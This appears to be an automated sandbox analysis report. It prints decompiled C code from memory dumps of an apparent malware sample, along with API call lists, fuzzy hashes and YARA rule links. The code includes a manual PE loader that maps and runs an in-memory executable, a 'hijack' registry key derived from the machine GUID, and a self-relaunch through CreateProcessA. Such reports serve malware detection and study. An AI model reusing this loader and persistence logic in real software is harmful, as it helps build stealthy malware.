				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E1002297F);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF20(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF20(_t41,  &_v311, 0, 0x103);
				E1001A600(__ebx, _t41, __esi, _t50,  &_v44); // executed
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push(E100011E0( &_v44));
				E1000CC93(_t41,  &_v312, "%s%s 200 %s",  &_v576);
				E1001A1D0(_t50,  &_v312); // executed
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}













                                                                                                                                                    0x1001fdc0
                                                                                                                                                    0x1001fdc0
                                                                                                                                                    0x1001fdc3
                                                                                                                                                    0x1001fdc5
                                                                                                                                                    0x1001fdd0
                                                                                                                                                    0x1001fdd1
                                                                                                                                                    0x1001fdde
                                                                                                                                                    0x1001fde5
                                                                                                                                                    0x1001fdfa
                                                                                                                                                    0x1001fe02
                                                                                                                                                    0x1001fe17
                                                                                                                                                    0x1001fe23
                                                                                                                                                    0x1001fe37
                                                                                                                                                    0x1001fe45
                                                                                                                                                    0x1001fe4e
                                                                                                                                                    0x1001fe62
                                                                                                                                                    0x1001fe71
                                                                                                                                                    0x1001fe7c
                                                                                                                                                    0x1001fe81
                                                                                                                                                    0x1001fe8b
                                                                                                                                                    0x1001fe93
                                                                                                                                                    0x1001fe9d

                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 1001FDFA
                                                                                                                                                    • _memset.LIBCMT ref: 1001FE17
                                                                                                                                                      • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                      • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                      • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FE37
                                                                                                                                                    • _sprintf.LIBCMT ref: 1001FE62
                                                                                                                                                      • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                      • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                      • Part of subcall function 1001A1D0: CreateProcessA.KERNELBASE ref: 1001A22B
                                                                                                                                                      • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                      • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                    • String ID: %s%s 200 %s
                                                                                                                                                    • API String ID: 3552933064-2772210913
                                                                                                                                                    • Opcode ID: 31d8008645f00a379b365712b4ee66dd954b1420580eda9468bbd8f77a0f0b3e
                                                                                                                                                    • Instruction ID: 5bcc6e5cb1870c0527a32f288bcdaea0cf9dc569dd8e8c245f7d0e97b5eadc48
                                                                                                                                                    • Opcode Fuzzy Hash: 31d8008645f00a379b365712b4ee66dd954b1420580eda9468bbd8f77a0f0b3e
                                                                                                                                                    • Instruction Fuzzy Hash: 1E1198B6C00208ABE714EB90DC56FDDB778EB14750F4441A4F619661C5EB747788CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001F990, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                    			E1001F990(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v275;
				char _v276;
				void* __ebp;
				void* _t20;
				void* _t37;

				_t37 = __eflags;
				_t28 = __edi;
				_v276 = 0;
				E1000CF20(__edi,  &_v275, 0, 0x103);
				_v12 = 0x104;
				E1001A2F0( &_v276,  &_v12); // executed
				E1000CD96( &_v276,  &_v276, 0x104, "hijack");
				_v8 = E1001A480(__ebx,  &_v276, _t28, __esi, _t37,  &_v276);
				_t20 = E1000CC93(_t28, _a4, "SOFTWARE\\Microsoft\\%s", _v8);
				_t38 = _v8;
				if(_v8 != 0) {
					_push(_v8);
					return E1000CA30(__ebx, _t28, __esi, _t38);
				}
				return _t20;
			}










                                                                                                                                                    0x1001f990
                                                                                                                                                    0x1001f990
                                                                                                                                                    0x1001f999
                                                                                                                                                    0x1001f9ae
                                                                                                                                                    0x1001f9b6
                                                                                                                                                    0x1001f9c8
                                                                                                                                                    0x1001f9e1
                                                                                                                                                    0x1001f9f8
                                                                                                                                                    0x1001fa08
                                                                                                                                                    0x1001fa10
                                                                                                                                                    0x1001fa14
                                                                                                                                                    0x1001fa19
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001fa1f
                                                                                                                                                    0x1001fa25

                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 1001F9AE
                                                                                                                                                      • Part of subcall function 1001A2F0: RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                    • _strcat_s.LIBCMT ref: 1001F9E1
                                                                                                                                                      • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                      • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                      • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                      • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                      • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                      • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                    • _sprintf.LIBCMT ref: 1001FA08
                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                      • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,10330FC8,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                      • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,10330FC8), ref: 1000CAA9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastOpen___sbh_find_block___sbh_free_block_strcat_s
                                                                                                                                                    • String ID: SOFTWARE\Microsoft\%s$hijack
                                                                                                                                                    • API String ID: 3138967372-3622423033
                                                                                                                                                    • Opcode ID: afcdf2f0fe49c8f7912972394664441b483a717b1bb3586a66424ea47b80ed47
                                                                                                                                                    • Instruction ID: 9399b5cfcd873c48396239d23a26fdd32b2e9067639008cfe42ca2b6aed02eb6
                                                                                                                                                    • Opcode Fuzzy Hash: afcdf2f0fe49c8f7912972394664441b483a717b1bb3586a66424ea47b80ed47
                                                                                                                                                    • Instruction Fuzzy Hash: 7D0152FAC0020CA7DB15D7A0EC47FE97378DB58304F0404A9E61856141F6B5A7C8CB92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001A2F0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E1001A2F0(char* _a4, int* _a8) {
				void* _v8;
				int* _v12;
				long _t11;
				long _t13;

				_v12 = 0;
				_v8 = 0;
				_t11 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Cryptography", 0, 0x101,  &_v8); // executed
				if(_t11 == 0) {
					_t13 = RegQueryValueExA(_v8, "MachineGuid", 0, 0, _a4, _a8); // executed
					if(_t13 == 0) {
						_v12 = 1;
					}
					RegCloseKey(_v8); // executed
					return _v12;
				}
				return 0;
			}







                                                                                                                                                    0x1001a2f6
                                                                                                                                                    0x1001a2fd
                                                                                                                                                    0x1001a319
                                                                                                                                                    0x1001a321
                                                                                                                                                    0x1001a33c
                                                                                                                                                    0x1001a344
                                                                                                                                                    0x1001a34a
                                                                                                                                                    0x1001a34a
                                                                                                                                                    0x1001a355
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001a35b
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                    • RegQueryValueExA.KERNELBASE(00000000,MachineGuid,00000000,00000000,00000000,?), ref: 1001A33C
                                                                                                                                                    • RegCloseKey.KERNELBASE(00000000), ref: 1001A355
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                    • String ID: MachineGuid$Software\Microsoft\Cryptography
                                                                                                                                                    • API String ID: 3677997916-880526231
                                                                                                                                                    • Opcode ID: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
                                                                                                                                                    • Instruction ID: 9e24c58cdf23cf18939fbcaabd435f76492adcd0c706e8d6ab3c4d486606bf24
                                                                                                                                                    • Opcode Fuzzy Hash: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
                                                                                                                                                    • Instruction Fuzzy Hash: 71F0F474600208FBEB10DFA4CC85F9D77B8EB04745F608044FA15AA180D775DB819765
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001F4A0, Relevance: 7.6, APIs: 5, Instructions: 65registrytimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E1001F4A0(void* _a4, char* _a8) {
				char* _v8;
				struct _FILETIME _v12;
				void* _v16;
				struct _SYSTEMTIME _v32;
				char* _v40;
				char* _v44;
				struct _FILETIME _v52;
				long _t27;
				char* _t43;

				_v44 = 0;
				_v40 = 0;
				_v16 = 0;
				_t27 = RegOpenKeyExA(_a4, _a8, 0, 0x101,  &_v16); // executed
				if(_t27 == 0) {
					if(RegQueryInfoKeyA(_v16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
						_v32.wYear = 0x7b2;
						_v32.wMonth = 1;
						_v32.wDay = 1;
						_v32.wHour = 0;
						_v32.wMinute = 0;
						_v32.wSecond = 0;
						_v32.wMilliseconds = 0;
						SystemTimeToFileTime( &_v32,  &_v52);
						_t43 = _v8;
						asm("sbb edx, [ebp-0x2c]");
						_v44 = E1000F290(_v12 - _v52.dwLowDateTime, _t43, 0x2710, 0);
						_v40 = _t43;
					}
					RegCloseKey(_v16);
				}
				return _v44;
			}












                                                                                                                                                    0x1001f4a6
                                                                                                                                                    0x1001f4ad
                                                                                                                                                    0x1001f4b4
                                                                                                                                                    0x1001f4ce
                                                                                                                                                    0x1001f4d6
                                                                                                                                                    0x1001f500
                                                                                                                                                    0x1001f502
                                                                                                                                                    0x1001f508
                                                                                                                                                    0x1001f50e
                                                                                                                                                    0x1001f514
                                                                                                                                                    0x1001f51a
                                                                                                                                                    0x1001f520
                                                                                                                                                    0x1001f526
                                                                                                                                                    0x1001f534
                                                                                                                                                    0x1001f540
                                                                                                                                                    0x1001f543
                                                                                                                                                    0x1001f554
                                                                                                                                                    0x1001f557
                                                                                                                                                    0x1001f557
                                                                                                                                                    0x1001f55e
                                                                                                                                                    0x1001f55e
                                                                                                                                                    0x1001f56d

                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00000101,00000000), ref: 1001F4CE
                                                                                                                                                    • RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 1001F4F8
                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F534
                                                                                                                                                    • __aulldiv.LIBCMT ref: 1001F54F
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 1001F55E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Time$CloseFileInfoOpenQuerySystem__aulldiv
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3147484438-0
                                                                                                                                                    • Opcode ID: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
                                                                                                                                                    • Instruction ID: 6ac3f46dae9d66049611ff428ba7790207c0dca18eda03b4da7369df6ee0e458
                                                                                                                                                    • Opcode Fuzzy Hash: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
                                                                                                                                                    • Instruction Fuzzy Hash: 6D21FC75E10208ABEB00CFD4C898FEEB7B9FF48704F108548E514BB290D7B59A45CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001F3D0, Relevance: 7.6, APIs: 5, Instructions: 61timefileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E1001F3D0(char* _a4) {
				struct _SYSTEMTIME _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				struct _FILETIME _v36;
				struct _FILETIME _v44;
				struct _FILETIME _v52;
				struct _FILETIME _v60;
				void* _v64;
				int _t28;
				struct _SECURITY_ATTRIBUTES* _t44;

				_v28 = 0;
				_v24 = 0;
				_t28 = PathFileExistsA(_a4); // executed
				if(_t28 != 0) {
					_v64 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x2000000, 0);
					if(_v64 != 0xffffffff && GetFileTime(_v64,  &_v36,  &_v44,  &_v52) != 0) {
						_v20.wYear = 0x7b2;
						_v20.wMonth = 1;
						_v20.wDay = 1;
						_v20.wHour = 0;
						_v20.wMinute = 0;
						_v20.wSecond = 0;
						_v20.wMilliseconds = 0;
						SystemTimeToFileTime( &_v20,  &_v60);
						_t44 = _v36.dwLowDateTime - _v60.dwLowDateTime;
						asm("sbb eax, [ebp-0x34]");
						_v28 = E1000F290(_t44, _v36.dwHighDateTime, 0x2710, 0);
						_v24 = _t44;
					}
				}
				return _v28;
			}













                                                                                                                                                    0x1001f3d6
                                                                                                                                                    0x1001f3dd
                                                                                                                                                    0x1001f3e8
                                                                                                                                                    0x1001f3f0
                                                                                                                                                    0x1001f412
                                                                                                                                                    0x1001f419
                                                                                                                                                    0x1001f435
                                                                                                                                                    0x1001f43b
                                                                                                                                                    0x1001f441
                                                                                                                                                    0x1001f447
                                                                                                                                                    0x1001f44d
                                                                                                                                                    0x1001f453
                                                                                                                                                    0x1001f459
                                                                                                                                                    0x1001f467
                                                                                                                                                    0x1001f470
                                                                                                                                                    0x1001f476
                                                                                                                                                    0x1001f487
                                                                                                                                                    0x1001f48a
                                                                                                                                                    0x1001f48a
                                                                                                                                                    0x1001f419
                                                                                                                                                    0x1001f496

                                                                                                                                                    APIs
                                                                                                                                                    • PathFileExistsA.KERNELBASE(?), ref: 1001F3E8
                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 1001F40C
                                                                                                                                                    • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 1001F42B
                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F467
                                                                                                                                                    • __aulldiv.LIBCMT ref: 1001F482
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Time$CreateExistsPathSystem__aulldiv
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3038978132-0
                                                                                                                                                    • Opcode ID: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
                                                                                                                                                    • Instruction ID: 94f5442095f36b7f33c28a28e912268f677076f0b3d524be3b20220ad1e1facd
                                                                                                                                                    • Opcode Fuzzy Hash: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
                                                                                                                                                    • Instruction Fuzzy Hash: 9A21E875A10208ABEB00DFD4D899FEEB7B8EF08704F108608E505BB290D775A685CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001A740, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                    			E1001A740(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				char _v279;
				char _v280;
				intOrPtr _v284;
				char _v312;
				signed int _v316;
				void* __ebp;
				void* _t27;
				intOrPtr _t52;
				void* _t55;

				_t51 = __esi;
				_t50 = __edi;
				_t37 = __ebx;
				_push(0xffffffff);
				_push(E10022953);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_v316 = 0;
				E10001160( &_v312, __eflags, 0x10024c8f);
				_v8 = 0;
				_v280 = 0;
				E1000CF20(__edi,  &_v279, 0, 0x103);
				E1001DC00(__ebx, _t50, __esi,  &_v280); // executed
				_t46 =  &_v280;
				_t27 = E1000CAC0( &_v280);
				_t55 = _t52 - 0x12c + 0x10;
				_t59 = _t27;
				if(_t27 == 0) {
					E1000D8A3( &_v280,  &_v280, 0x104, "unknown err");
					_t55 = _t55 + 0xc;
				}
				_v284 = E1001A480(_t37, _t46, _t50, _t51, _t59,  &_v280);
				E100011C0( &_v312, _v284);
				_push(_v284);
				E1000CA30(_t37, _t50, _t51, _t59);
				E10001110(_a4, _t59,  &_v312);
				_v316 = _v316 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v312);
				 *[fs:0x0] = _v16;
				return _a4;
			}














                                                                                                                                                    0x1001a740
                                                                                                                                                    0x1001a740
                                                                                                                                                    0x1001a740
                                                                                                                                                    0x1001a743
                                                                                                                                                    0x1001a745
                                                                                                                                                    0x1001a750
                                                                                                                                                    0x1001a751
                                                                                                                                                    0x1001a75e
                                                                                                                                                    0x1001a773
                                                                                                                                                    0x1001a778
                                                                                                                                                    0x1001a77f
                                                                                                                                                    0x1001a794
                                                                                                                                                    0x1001a7a3
                                                                                                                                                    0x1001a7a8
                                                                                                                                                    0x1001a7af
                                                                                                                                                    0x1001a7b4
                                                                                                                                                    0x1001a7b7
                                                                                                                                                    0x1001a7b9
                                                                                                                                                    0x1001a7cc
                                                                                                                                                    0x1001a7d1
                                                                                                                                                    0x1001a7d1
                                                                                                                                                    0x1001a7e3
                                                                                                                                                    0x1001a7f6
                                                                                                                                                    0x1001a801
                                                                                                                                                    0x1001a802
                                                                                                                                                    0x1001a814
                                                                                                                                                    0x1001a822
                                                                                                                                                    0x1001a828
                                                                                                                                                    0x1001a835
                                                                                                                                                    0x1001a840
                                                                                                                                                    0x1001a84a

                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 1001A794
                                                                                                                                                      • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC28
                                                                                                                                                      • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC45
                                                                                                                                                      • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC5B
                                                                                                                                                      • Part of subcall function 1001DC00: GetVersionExW.KERNEL32(00000114), ref: 1001DC74
                                                                                                                                                      • Part of subcall function 1001DC00: _strcpy_s.LIBCMT ref: 1001DDA9
                                                                                                                                                    • _strlen.LIBCMT ref: 1001A7AF
                                                                                                                                                    • _strcpy_s.LIBCMT ref: 1001A7CC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$_strcpy_s$Version_strlen
                                                                                                                                                    • String ID: unknown err
                                                                                                                                                    • API String ID: 3541540748-813478822
                                                                                                                                                    • Opcode ID: 0f2bb47c0a387754298ac8fa451fa214a95a9aa0f1bcc3625692823095318a19
                                                                                                                                                    • Instruction ID: fd4ff29d9d1704b4cf284c40191c3fa505d240a218f01ca0bdf6826ea30aff8d
                                                                                                                                                    • Opcode Fuzzy Hash: 0f2bb47c0a387754298ac8fa451fa214a95a9aa0f1bcc3625692823095318a19
                                                                                                                                                    • Instruction Fuzzy Hash: 61217FB5C0021CABDB28DB54DD82BD9B774EB04754F4041D4B609A7285EB34BB84CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00404F96, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 156COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                    			E00404F96(void* __ebx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v8;
				signed short* _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				void* _t103;
				void* _t118;
				intOrPtr _t152;
				void* _t158;
				void* _t160;

				_t118 = __ebx;
				_v12 = _a4;
				if(( *_v12 & 0x0000ffff) == 0x5a4d) {
					_v36 = _a4 + _v12[0x1e];
					if( *_v36 == 0x4550) {
						_v16 = VirtualAlloc( *(_v36 + 0x34),  *(_v36 + 0x50), 0x3000, 4);
						if(_v16 != 0) {
							L7:
							_v28 = VirtualAlloc(0, 0x1c, 0x3000, 4);
							if(_v28 != 0) {
								 *((intOrPtr*)(_v28 + 4)) = _v16;
								 *(_v28 + 8) = 0;
								 *((intOrPtr*)(_v28 + 0xc)) = _a8;
								 *((intOrPtr*)(_v28 + 0x10)) = _a12;
								 *((intOrPtr*)(_v28 + 0x14)) = _a16;
								 *((intOrPtr*)(_v28 + 0x18)) = _a20;
								_v8 = VirtualAlloc(_v16,  *(_v36 + 0x54), 0x1000, 4);
								E00405196(_v8, _v12, _v12[0x1e] +  *(_v36 + 0x54));
								 *_v28 = _v8 + _v12[0x1e];
								 *((intOrPtr*)( *_v28 + 0x34)) = _v16;
								E00405386(_a4, _v36, _v28); // executed
								_t160 = _t158 + 0x18;
								_t152 = _v16 -  *(_v36 + 0x34);
								_v32 = _t152;
								if(_t152 != 0) {
									E004055F6(_t118, _v28, _v28, _v32);
									_t160 = _t160 + 8;
								}
								_t103 = E004056D6(_v28); // executed
								if(_t103 != 0) {
									E00405486(_v28); // executed
									if( *((intOrPtr*)( *_v28 + 0x28)) == 0) {
										L17:
										return _v28;
									}
									_v24 = _v16 +  *((intOrPtr*)( *_v28 + 0x28));
									_v20 = _v24(_v16, 1, 0);
									if(_v20 != 0) {
										 *(_v28 + 8) = 1;
										goto L17;
									}
									goto L18;
								} else {
									L18:
									return 0;
								}
							}
							return 0;
						}
						_v16 = _a16(0,  *(_v36 + 0x50), 0x3000, 4);
						if(_v16 != 0) {
							goto L7;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}
















                                                                                                                                                    0x00404f96
                                                                                                                                                    0x00404f9f
                                                                                                                                                    0x00404fae
                                                                                                                                                    0x00404fc0
                                                                                                                                                    0x00404fcc
                                                                                                                                                    0x00404fed
                                                                                                                                                    0x00404ff4
                                                                                                                                                    0x00405019
                                                                                                                                                    0x00405027
                                                                                                                                                    0x0040502e
                                                                                                                                                    0x0040503d
                                                                                                                                                    0x00405043
                                                                                                                                                    0x00405050
                                                                                                                                                    0x00405059
                                                                                                                                                    0x00405062
                                                                                                                                                    0x0040506b
                                                                                                                                                    0x00405083
                                                                                                                                                    0x0040509b
                                                                                                                                                    0x004050af
                                                                                                                                                    0x004050b9
                                                                                                                                                    0x004050c8
                                                                                                                                                    0x004050cd
                                                                                                                                                    0x004050d6
                                                                                                                                                    0x004050d9
                                                                                                                                                    0x004050dc
                                                                                                                                                    0x004050e6
                                                                                                                                                    0x004050eb
                                                                                                                                                    0x004050eb
                                                                                                                                                    0x004050f2
                                                                                                                                                    0x004050fc
                                                                                                                                                    0x00405106
                                                                                                                                                    0x00405117
                                                                                                                                                    0x00405149
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405149
                                                                                                                                                    0x00405124
                                                                                                                                                    0x00405132
                                                                                                                                                    0x00405139
                                                                                                                                                    0x00405142
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405142
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004050fe
                                                                                                                                                    0x0040514e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040514e
                                                                                                                                                    0x004050fc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405030
                                                                                                                                                    0x00405009
                                                                                                                                                    0x00405010
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405012
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404fce
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.627045125.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.627003150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627030438.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627057789.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp Download File
